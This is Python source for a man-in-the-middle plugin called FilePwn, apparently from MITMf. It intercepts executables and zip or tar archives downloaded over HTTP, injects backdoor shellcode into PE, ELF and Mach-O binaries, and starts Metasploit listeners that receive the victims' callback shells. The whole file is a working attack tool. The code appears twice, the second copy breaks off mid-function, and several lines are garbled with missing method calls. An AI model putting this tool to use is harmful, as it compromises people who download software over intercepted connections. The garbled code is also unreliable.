class FilePwn(Plugin): name = "FilePwn" optname = "filepwn" desc = "Backdoor executables being sent over http using bdfactory" implements = ["handleResponse"] tree_output = ["BDFProxy v0.3.2 online"] version = "0.3" has_opts = False def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' self.options = options self.patched = multiprocessing.Queue() #FOR FUTURE USE self.binaryMimeTypes = [ "application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream' ] #FOR FUTURE USE self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip'] #USED NOW self.magicNumbers = { 'elf': { 'number': '7f454c46'.decode('hex'), 'offset': 0 }, 'pe': { 'number': 'MZ', 'offset': 0 }, 'gz': { 'number': '1f8b'.decode('hex'), 'offset': 0 }, 'bz': { 'number': 'BZ', 'offset': 0 }, 'zip': { 'number': '504b0304'.decode('hex'), 'offset': 0 }, 'tar': { 'number': 'ustar', 'offset': 257 }, 'fatfile': { 'number': 'cafebabe'.decode('hex'), 'offset': 0 }, 'machox64': { 'number': 'cffaedfe'.decode('hex'), 'offset': 0 }, 'machox86': { 'number': 'cefaedfe'.decode('hex'), 'offset': 0 }, } #NOT USED NOW #self.supportedBins = ('MZ', '7f454c46'.decode('hex')) #Metasploit options msfcfg = options.configfile['MITMf']['Metasploit'] rpcip = msfcfg['rpcip'] rpcpass = msfcfg['rpcpass'] try: self.msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary self.msf.login('msf', rpcpass) version ='core.version')['version'] self.tree_output.append("Connected to Metasploit v%s" % version) except Exception: sys.exit( "[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server" ) #FilePwn options self.userConfig = options.configfile['FilePwn'] self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax'] self.WindowsIntelx86 = self.userConfig['targets']['ALL'][ 'WindowsIntelx86'] self.WindowsIntelx64 = self.userConfig['targets']['ALL'][ 'WindowsIntelx64'] self.WindowsType = self.userConfig['targets']['ALL']['WindowsType'] self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86'] self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64'] self.LinuxType = self.userConfig['targets']['ALL']['LinuxType'] self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86'] self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64'] self.FatPriority = self.userConfig['targets']['ALL']['FatPriority'] self.zipblacklist = self.userConfig['ZIP']['blacklist'] self.tarblacklist = self.userConfig['TAR']['blacklist'] self.tree_output.append("Setting up Metasploit payload handlers") jobs ='job.list') for config in [ self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64 ]: cmd = "use exploit/multi/handler\n" cmd += "set payload {}\n".format(config["MSFPAYLOAD"]) cmd += "set LHOST {}\n".format(config["HOST"]) cmd += "set LPORT {}\n".format(config["PORT"]) cmd += "exploit -j\n" if jobs: for pid, name in jobs.iteritems(): info ='', [pid]) if (info['name'] != "Exploit: multi/handler") or ( info['datastore']['payload'] != config["MSFPAYLOAD"] ) or (info['datastore']['LPORT'] != config["PORT"]) or ( info['datastore']['lhost'] != config['HOST']): #Create a virtual console c_id ='console.create')['id'] #write the cmd to the newly created console'console.write', [c_id, cmd]) else: #Create a virtual console c_id ='console.create')['id'] #write the cmd to the newly created console'console.write', [c_id, cmd]) def convert_to_Bool(self, aString): if aString.lower() == 'true': return True elif aString.lower() == 'false': return False elif aString.lower() == 'none': return None def bytes_have_format(self, bytess, formatt): number = self.magicNumbers[formatt] if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']: return True return False def binaryGrinder(self, binaryFile): """ Feed potential binaries into this function, it will return the result PatchedBinary, False, or None """ with open(binaryFile, 'r+b') as f: binaryTMPHandle = binaryHeader = binaryTMPHandle[:4] result = None try: if binaryHeader[:2] == 'MZ': # PE/COFF pe = pefile.PE(data=binaryTMPHandle, fast_load=True) magic = pe.OPTIONAL_HEADER.Magic machineType = pe.FILE_HEADER.Machine #update when supporting more than one arch if (magic == int('20B', 16) and machineType == 0x8664 and self.WindowsType.lower() in ['all', 'x64']): add_section = False cave_jumping = False if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append': add_section = True elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump': cave_jumping = True # if automatic override if self.WindowsIntelx64['PATCH_METHOD'].lower( ) == 'automatic': cave_jumping = True targetFile = pebin.pebin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.WindowsIntelx64['SHELL'], HOST=self.WindowsIntelx64['HOST'], PORT=int(self.WindowsIntelx64['PORT']), ADD_SECTION=add_section, CAVE_JUMPING=cave_jumping, IMAGE_TYPE=self.WindowsType, PATCH_DLL=self.convert_to_Bool( self.WindowsIntelx64['PATCH_DLL']), SUPPLIED_SHELLCODE=self. WindowsIntelx64['SUPPLIED_SHELLCODE'], ZERO_CERT=self.convert_to_Bool( self.WindowsIntelx64['ZERO_CERT']), PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD']. lower()) result = targetFile.run_this() elif (machineType == 0x14c and self.WindowsType.lower() in ['all', 'x86']): add_section = False cave_jumping = False #add_section wins for cave_jumping #default is single for BDF if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append': add_section = True elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump': cave_jumping = True # if automatic override if self.WindowsIntelx86['PATCH_METHOD'].lower( ) == 'automatic': cave_jumping = True targetFile = pebin.pebin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.WindowsIntelx86['SHELL'], HOST=self.WindowsIntelx86['HOST'], PORT=int(self.WindowsIntelx86['PORT']), ADD_SECTION=add_section, CAVE_JUMPING=cave_jumping, IMAGE_TYPE=self.WindowsType, PATCH_DLL=self.convert_to_Bool( self.WindowsIntelx86['PATCH_DLL']), SUPPLIED_SHELLCODE=self. WindowsIntelx86['SUPPLIED_SHELLCODE'], ZERO_CERT=self.convert_to_Bool( self.WindowsIntelx86['ZERO_CERT']), PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD']. lower()) result = targetFile.run_this() elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False) targetFile.support_check() if targetFile.class_type == 0x1: #x86CPU Type targetFile = elfbin.elfbin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.LinuxIntelx86['SHELL'], HOST=self.LinuxIntelx86['HOST'], PORT=int(self.LinuxIntelx86['PORT']), SUPPLIED_SHELLCODE=self. LinuxIntelx86['SUPPLIED_SHELLCODE'], IMAGE_TYPE=self.LinuxType) result = targetFile.run_this() elif targetFile.class_type == 0x2: #x64 targetFile = elfbin.elfbin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.LinuxIntelx64['SHELL'], HOST=self.LinuxIntelx64['HOST'], PORT=int(self.LinuxIntelx64['PORT']), SUPPLIED_SHELLCODE=self. LinuxIntelx64['SUPPLIED_SHELLCODE'], IMAGE_TYPE=self.LinuxType) result = targetFile.run_this() elif binaryHeader[:4].encode('hex') in [ 'cefaedfe', 'cffaedfe', 'cafebabe' ]: # Macho targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False) targetFile.support_check() #ONE CHIP SET MUST HAVE PRIORITY in FAT FILE if targetFile.FAT_FILE is True: if self.FatPriority == 'x86': targetFile = machobin.machobin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx86['SHELL'], HOST=self.MachoIntelx86['HOST'], PORT=int(self.MachoIntelx86['PORT']), SUPPLIED_SHELLCODE=self. MachoIntelx86['SUPPLIED_SHELLCODE'], FAT_PRIORITY=self.FatPriority) result = targetFile.run_this() elif self.FatPriority == 'x64': targetFile = machobin.machobin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx64['SHELL'], HOST=self.MachoIntelx64['HOST'], PORT=int(self.MachoIntelx64['PORT']), SUPPLIED_SHELLCODE=self. MachoIntelx64['SUPPLIED_SHELLCODE'], FAT_PRIORITY=self.FatPriority) result = targetFile.run_this() elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7': targetFile = machobin.machobin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx86['SHELL'], HOST=self.MachoIntelx86['HOST'], PORT=int(self.MachoIntelx86['PORT']), SUPPLIED_SHELLCODE=self. MachoIntelx86['SUPPLIED_SHELLCODE'], FAT_PRIORITY=self.FatPriority) result = targetFile.run_this() elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007': targetFile = machobin.machobin( FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx64['SHELL'], HOST=self.MachoIntelx64['HOST'], PORT=int(self.MachoIntelx64['PORT']), SUPPLIED_SHELLCODE=self. MachoIntelx64['SUPPLIED_SHELLCODE'], FAT_PRIORITY=self.FatPriority) result = targetFile.run_this() self.patched.put(result) return except Exception as e: print 'Exception', str(e) mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e)) return None def tar_files(self, aTarFileBytes, formatt): "When called will unpack and edit a Tar File and return a tar file" print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB' if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']): print "[!] TarFile over allowed size""TarFIle maxSize met %s", len(aTarFileBytes)) self.patched.put(aTarFileBytes) return with tempfile.NamedTemporaryFile() as tarFileStorage: tarFileStorage.write(aTarFileBytes) tarFileStorage.flush() if not tarfile.is_tarfile( print '[!] Not a tar file' self.patched.put(aTarFileBytes) return compressionMode = ':' if formatt == 'gz': compressionMode = ':gz' if formatt == 'bz': compressionMode = ':bz2' tarFile = None try: tarFile =, mode='r' + compressionMode) except tarfile.ReadError: pass if tarFile is None: print '[!] Not a tar file' self.patched.put(aTarFileBytes) return print '[*] Tar file contents and info:' print '[*] Compression:', formatt members = tarFile.getmembers() for info in members: print "\t",, info.mtime, info.size newTarFileStorage = tempfile.NamedTemporaryFile() newTarFile ='w' + compressionMode, fileobj=newTarFileStorage) patchCount = 0 wasPatched = False for info in members: print "[*] >>> Next file in tarfile:", if not info.isfile(): print, 'is not a file' newTarFile.addfile(info, tarFile.extractfile(info)) continue if info.size >= long(self.FileSizeMax): print, 'is too big' newTarFile.addfile(info, tarFile.extractfile(info)) continue # Check against keywords keywordCheck = False if type(self.tarblacklist) is str: if self.tarblacklist.lower() in keywordCheck = True else: for keyword in self.tarblacklist: if keyword.lower() in keywordCheck = True continue if keywordCheck is True: print "[!] Tar blacklist enforced!"'Tar blacklist enforced on %s', continue # Try to patch extractedFile = tarFile.extractfile(info) if patchCount >= int(self.userConfig['TAR']['patchCount']): newTarFile.addfile(info, extractedFile) else: # create the file on disk temporarily for fileGrinder to run on it with tempfile.NamedTemporaryFile() as tmp: shutil.copyfileobj(extractedFile, tmp) tmp.flush() patchResult = self.binaryGrinder( if patchResult: patchCount += 1 file2 = "backdoored/" + os.path.basename( print "[*] Patching complete, adding to tar file." info.size = os.stat(file2).st_size with open(file2, 'rb') as f: newTarFile.addfile(info, f) "%s in tar patched, adding to tarfile", os.remove(file2) wasPatched = True else: print "[!] Patching failed" with open(, 'rb') as f: newTarFile.addfile(info, f) "%s patching failed. Keeping original file in tar.", if patchCount == int(self.userConfig['TAR']['patchCount']):"Met Tar config patchCount limit.") # finalize the writing of the tar file first newTarFile.close() # then read the new tar file into memory ret = newTarFileStorage.close() # it's automatically deleted if wasPatched is False: # If nothing was changed return the original print "[*] No files were patched forwarding original file" self.patched.put(aTarFileBytes) return else: self.patched.put(ret) return def zip_files(self, aZipFile): "When called will unpack and edit a Zip File and return a zip file" print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB' if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']): print "[!] ZipFile over allowed size""ZipFIle maxSize met %s", len(aZipFile)) self.patched.put(aZipFile) return tmpRan = ''.join( random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8)) tmpDir = '/tmp/' + tmpRan tmpFile = '/tmp/' + tmpRan + '.zip' os.mkdir(tmpDir) with open(tmpFile, 'w') as f: f.write(aZipFile) zippyfile = zipfile.ZipFile(tmpFile, 'r') #encryption test try: zippyfile.testzip() except RuntimeError as e: if 'encrypted' in str(e):'Encrypted zipfile found. Not patching.') return aZipFile print "[*] ZipFile contents and info:" for info in zippyfile.infolist(): print "\t", info.filename, info.date_time, info.file_size zippyfile.extractall(tmpDir) patchCount = 0 wasPatched = False for info in zippyfile.infolist(): print "[*] >>> Next file in zipfile:", info.filename if os.path.isdir(tmpDir + '/' + info.filename) is True: print info.filename, 'is a directory' continue #Check against keywords keywordCheck = False if type(self.zipblacklist) is str: if self.zipblacklist.lower() in info.filename.lower(): keywordCheck = True else: for keyword in self.zipblacklist: if keyword.lower() in info.filename.lower(): keywordCheck = True continue if keywordCheck is True: print "[!] Zip blacklist enforced!"'Zip blacklist enforced on %s', info.filename) continue patchResult = self.binaryGrinder(tmpDir + '/' + info.filename) if patchResult: patchCount += 1 file2 = "backdoored/" + os.path.basename(info.filename) print "[*] Patching complete, adding to zip file." shutil.copyfile(file2, tmpDir + '/' + info.filename)"%s in zip patched, adding to zipfile", info.filename) os.remove(file2) wasPatched = True else: print "[!] Patching failed" "%s patching failed. Keeping original file in zip.", info.filename) print '-' * 10 if patchCount >= int(self.userConfig['ZIP'] ['patchCount']): # Make this a setting."Met Zip config patchCount limit.") break zippyfile.close() zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED) print "[*] Writing to zipfile:", tmpFile for base, dirs, files in os.walk(tmpDir): for afile in files: filename = os.path.join(base, afile) print '[*] Writing filename to zipfile:', filename.replace( tmpDir + '/', '') zipResult.write(filename, arcname=filename.replace(tmpDir + '/', '')) zipResult.close() #clean up shutil.rmtree(tmpDir) with open(tmpFile, 'rb') as f: tempZipFile = os.remove(tmpFile) if wasPatched is False: print "[*] No files were patched forwarding original file" self.patched.put(aZipFile) return else: self.patched.put(tempZipFile) return def handleResponse(self, request, data): content_header = request.client.headers['Content-Type'] client_ip = request.client.getClientIP() if content_header in self.zipMimeTypes: if self.bytes_have_format(data, 'zip'):"%s Detected supported zip file type!" % client_ip) process = multiprocessing.Process(name='zip',, args=(data, )) process.daemon = True process.start() process.join() bd_zip = self.patched.get() if bd_zip: "%s Patching complete, forwarding to client" % client_ip) return {'request': request, 'data': bd_zip} else: for tartype in ['gz', 'bz', 'tar']: if self.bytes_have_format(data, tartype): "%s Detected supported tar file type!" % client_ip) process = multiprocessing.Process( name='tar_files', target=self.tar_files, args=(data, )) process.daemon = True process.start() process.join() bd_tar = self.patched.get() if bd_tar: "%s Patching complete, forwarding to client" % client_ip) return {'request': request, 'data': bd_tar} elif content_header in self.binaryMimeTypes: for bintype in ['pe', 'elf', 'fatfile', 'machox64', 'machox86']: if self.bytes_have_format(data, bintype):"%s Detected supported binary type!" % client_ip) fd, tmpFile = mkstemp() with open(tmpFile, 'w') as f: f.write(data) process = multiprocessing.Process( name='binaryGrinder', target=self.binaryGrinder, args=(tmpFile, )) process.daemon = True process.start() process.join() patchb = self.patched.get() if patchb: bd_binary = open( "backdoored/" + os.path.basename(tmpFile), "rb").read() os.remove('./backdoored/' + os.path.basename(tmpFile)) "%s Patching complete, forwarding to client" % client_ip) return {'request': request, 'data': bd_binary} else: mitmf_logger.debug("%s File is not of supported Content-Type: %s" % (client_ip, content_header)) return {'request': request, 'data': data}
class FilePwn(Plugin): name = "FilePwn" optname = "filepwn" desc = "Backdoor executables being sent over http using bdfactory" implements = ["handleResponse"] tree_output = ["BDFProxy v0.3.2 online"] version = "0.3" has_opts = False def initialize(self, options): '''Called if plugin is enabled, passed the options namespace''' self.options = options self.patched = multiprocessing.Queue() #FOR FUTURE USE self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream'] #FOR FUTURE USE self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip'] #USED NOW self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0}, 'pe': {'number': 'MZ', 'offset': 0}, 'gz': {'number': '1f8b'.decode('hex'), 'offset': 0}, 'bz': {'number': 'BZ', 'offset': 0}, 'zip': {'number': '504b0304'.decode('hex'), 'offset': 0}, 'tar': {'number': 'ustar', 'offset': 257}, 'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0}, 'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0}, 'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0}, } #NOT USED NOW #self.supportedBins = ('MZ', '7f454c46'.decode('hex')) #Metasploit options msfcfg = options.configfile['MITMf']['Metasploit'] rpcip = msfcfg['rpcip'] rpcpass = msfcfg['rpcpass'] try: self.msf = Msfrpc({"host": rpcip}) #create an instance of msfrpc libarary self.msf.login('msf', rpcpass) version ='core.version')['version'] self.tree_output.append("Connected to Metasploit v%s" % version) except Exception: sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server") #FilePwn options self.userConfig = options.configfile['FilePwn'] self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax'] self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86'] self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64'] self.WindowsType = self.userConfig['targets']['ALL']['WindowsType'] self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86'] self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64'] self.LinuxType = self.userConfig['targets']['ALL']['LinuxType'] self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86'] self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64'] self.FatPriority = self.userConfig['targets']['ALL']['FatPriority'] self.zipblacklist = self.userConfig['ZIP']['blacklist'] self.tarblacklist = self.userConfig['TAR']['blacklist'] self.tree_output.append("Setting up Metasploit payload handlers") jobs ='job.list') for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]: cmd = "use exploit/multi/handler\n" cmd += "set payload {}\n".format(config["MSFPAYLOAD"]) cmd += "set LHOST {}\n".format(config["HOST"]) cmd += "set LPORT {}\n".format(config["PORT"]) cmd += "exploit -j\n" if jobs: for pid, name in jobs.iteritems(): info ='', [pid]) if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']): #Create a virtual console c_id ='console.create')['id'] #write the cmd to the newly created console'console.write', [c_id, cmd]) else: #Create a virtual console c_id ='console.create')['id'] #write the cmd to the newly created console'console.write', [c_id, cmd]) def convert_to_Bool(self, aString): if aString.lower() == 'true': return True elif aString.lower() == 'false': return False elif aString.lower() == 'none': return None def bytes_have_format(self, bytess, formatt): number = self.magicNumbers[formatt] if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']: return True return False def binaryGrinder(self, binaryFile): """ Feed potential binaries into this function, it will return the result PatchedBinary, False, or None """ with open(binaryFile, 'r+b') as f: binaryTMPHandle = binaryHeader = binaryTMPHandle[:4] result = None try: if binaryHeader[:2] == 'MZ': # PE/COFF pe = pefile.PE(data=binaryTMPHandle, fast_load=True) magic = pe.OPTIONAL_HEADER.Magic machineType = pe.FILE_HEADER.Machine #update when supporting more than one arch if (magic == int('20B', 16) and machineType == 0x8664 and self.WindowsType.lower() in ['all', 'x64']): add_section = False cave_jumping = False if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append': add_section = True elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump': cave_jumping = True # if automatic override if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic': cave_jumping = True targetFile = pebin.pebin(FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.WindowsIntelx64['SHELL'], HOST=self.WindowsIntelx64['HOST'], PORT=int(self.WindowsIntelx64['PORT']), ADD_SECTION=add_section, CAVE_JUMPING=cave_jumping, IMAGE_TYPE=self.WindowsType, PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']), SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'], ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']), PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower() ) result = targetFile.run_this() elif (machineType == 0x14c and self.WindowsType.lower() in ['all', 'x86']): add_section = False cave_jumping = False #add_section wins for cave_jumping #default is single for BDF if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append': add_section = True elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump': cave_jumping = True # if automatic override if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic': cave_jumping = True targetFile = pebin.pebin(FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.WindowsIntelx86['SHELL'], HOST=self.WindowsIntelx86['HOST'], PORT=int(self.WindowsIntelx86['PORT']), ADD_SECTION=add_section, CAVE_JUMPING=cave_jumping, IMAGE_TYPE=self.WindowsType, PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']), SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'], ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']), PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower() ) result = targetFile.run_this() elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False) targetFile.support_check() if targetFile.class_type == 0x1: #x86CPU Type targetFile = elfbin.elfbin(FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.LinuxIntelx86['SHELL'], HOST=self.LinuxIntelx86['HOST'], PORT=int(self.LinuxIntelx86['PORT']), SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'], IMAGE_TYPE=self.LinuxType ) result = targetFile.run_this() elif targetFile.class_type == 0x2: #x64 targetFile = elfbin.elfbin(FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.LinuxIntelx64['SHELL'], HOST=self.LinuxIntelx64['HOST'], PORT=int(self.LinuxIntelx64['PORT']), SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'], IMAGE_TYPE=self.LinuxType ) result = targetFile.run_this() elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False) targetFile.support_check() #ONE CHIP SET MUST HAVE PRIORITY in FAT FILE if targetFile.FAT_FILE is True: if self.FatPriority == 'x86': targetFile = machobin.machobin(FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx86['SHELL'], HOST=self.MachoIntelx86['HOST'], PORT=int(self.MachoIntelx86['PORT']), SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'], FAT_PRIORITY=self.FatPriority ) result = targetFile.run_this() elif self.FatPriority == 'x64': targetFile = machobin.machobin(FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx64['SHELL'], HOST=self.MachoIntelx64['HOST'], PORT=int(self.MachoIntelx64['PORT']), SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'], FAT_PRIORITY=self.FatPriority ) result = targetFile.run_this() elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7': targetFile = machobin.machobin(FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx86['SHELL'], HOST=self.MachoIntelx86['HOST'], PORT=int(self.MachoIntelx86['PORT']), SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'], FAT_PRIORITY=self.FatPriority ) result = targetFile.run_this() elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007': targetFile = machobin.machobin(FILE=binaryFile, OUTPUT=os.path.basename(binaryFile), SHELL=self.MachoIntelx64['SHELL'], HOST=self.MachoIntelx64['HOST'], PORT=int(self.MachoIntelx64['PORT']), SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'], FAT_PRIORITY=self.FatPriority ) result = targetFile.run_this() self.patched.put(result) return except Exception as e: print 'Exception', str(e) mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e)) return None def tar_files(self, aTarFileBytes, formatt): "When called will unpack and edit a Tar File and return a tar file" print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB' if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']): print "[!] TarFile over allowed size""TarFIle maxSize met %s", len(aTarFileBytes)) self.patched.put(aTarFileBytes) return with tempfile.NamedTemporaryFile() as tarFileStorage: tarFileStorage.write(aTarFileBytes) tarFileStorage.flush() if not tarfile.is_tarfile( print '[!] Not a tar file' self.patched.put(aTarFileBytes) return compressionMode = ':' if formatt == 'gz': compressionMode = ':gz' if formatt == 'bz': compressionMode = ':bz2' tarFile = None try: tarFile =, mode='r' + compressionMode) except tarfile.ReadError: pass if tarFile is None: print '[!] Not a tar file' self.patched.put(aTarFileBytes) return print '[*] Tar file contents and info:' print '[*] Compression:', formatt members = tarFile.getmembers() for info in members: print "\t",, info.mtime, info.size newTarFileStorage = tempfile.NamedTemporaryFile() newTarFile ='w' + compressionMode, fileobj=newTarFileStorage) patchCount = 0 wasPatched = False for info in members: print "[*] >>> Next file in tarfile:", if not info.isfile(): print, 'is not a file' newTarFile.addfile(info, tarFile.extractfile(info)) continue if info.size >= long(self.FileSizeMax): print, 'is too big' newTarFile.addfile(info, tarFile.extractfile(info)) continue # Check against keywords keywordCheck = False if type(self.tarblacklist) is str: if self.tarblacklist.lower() in keywordCheck = True else: for keyword in self.tarblacklist: if keyword.lower() in keywordCheck = True continue if keywordCheck is True: print "[!] Tar blacklist enforced!"'Tar blacklist enforced on %s', continue # Try to patch extractedFile = tarFile.extractfile(info) if patchCount >= int(self.userConfig['TAR']['patchCount']): newTarFile.addfile(info, extractedFile) else: # create the file on disk temporarily for fileGrinder to run on it with tempfile.NamedTemporaryFile() as tmp: shutil.copyfileobj(extractedFile, tmp) tmp.flush() patchResult = self.binaryGrinder( if patchResult: patchCount += 1 file2 = "backdoored/" + os.path.basename( print "[*] Patching complete, adding to tar file." info.size = os.stat(file2).st_size with open(file2, 'rb') as f: newTarFile.addfile(info, f)"%s in tar patched, adding to tarfile", os.remove(file2) wasPatched = True else: print "[!] Patching failed" with open(, 'rb') as f: newTarFile.addfile(info, f)"%s patching failed. Keeping original file in tar.", if patchCount == int(self.userConfig['TAR']['patchCount']):"Met Tar config patchCount limit.") # finalize the writing of the tar file first newTarFile.close() # then read the new tar file into memory ret = newTarFileStorage.close() # it's automatically deleted if wasPatched is False: # If nothing was changed return the original print "[*] No files were patched forwarding original file" self.patched.put(aTarFileBytes) return else: self.patched.put(ret) return def zip_files(self, aZipFile): "When called will unpack and edit a Zip File and return a zip file" print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB' if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']): print "[!] ZipFile over allowed size""ZipFIle maxSize met %s", len(aZipFile)) self.patched.put(aZipFile) return tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8)) tmpDir = '/tmp/' + tmpRan tmpFile = '/tmp/' + tmpRan + '.zip' os.mkdir(tmpDir) with open(tmpFile, 'w') as f: f.write(aZipFile) zippyfile = zipfile.ZipFile(tmpFile, 'r') #encryption test try: zippyfile.testzip() except RuntimeError as e: if 'encrypted' in str(e):'Encrypted zipfile found. Not patching.') return aZipFile print "[*] ZipFile contents and info:" for info in zippyfile.infolist(): print "\t", info.filename, info.date_time, info.file_size zippyfile.extractall(tmpDir) patchCount = 0 wasPatched = False for info in zippyfile.infolist(): print "[*] >>> Next file in zipfile:", info.filename if os.path.isdir(tmpDir + '/' + info.filename) is True: print info.filename, 'is a directory' continue #Check against keywords keywordCheck = False if type(self.zipblacklist) is str: if self.zipblacklist.lower() in info.filename.lower(): keywordCheck = True else: for keyword in self.zipblacklist: if keyword.lower() in info.filename.lower(): keywordCheck = True continue if keywordCheck is True: print "[!] Zip blacklist enforced!"'Zip blacklist enforced on %s', info.filename) continue patchResult = self.binaryGrinder(tmpDir + '/' + info.filename) if patchResult: patchCount += 1 file2 = "backdoored/" + os.path.basename(info.filename) print "[*] Patching complete, adding to zip file." shutil.copyfile(file2, tmpDir + '/' + info.filename)"%s in zip patched, adding to zipfile", info.filename) os.remove(file2) wasPatched = True else: print "[!] Patching failed""%s patching failed. Keeping original file in zip.", info.filename) print '-' * 10 if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting."Met Zip config patchCount limit.") break zippyfile.close() zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED) print "[*] Writing to zipfile:", tmpFile for base, dirs, files in os.walk(tmpDir): for afile in files: filename = os.path.join(base, afile) print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '') zipResult.write(filename, arcname=filename.replace(tmpDir + '/', '')) zipResult.close() #clean up shutil.rmtree(tmpDir) with open(tmpFile, 'rb') as f: tempZipFile = os.remove(tmpFile) if wasPatched is False: print "[*] No files were patched forwarding original file" self.patched.put(aZipFile) return else: 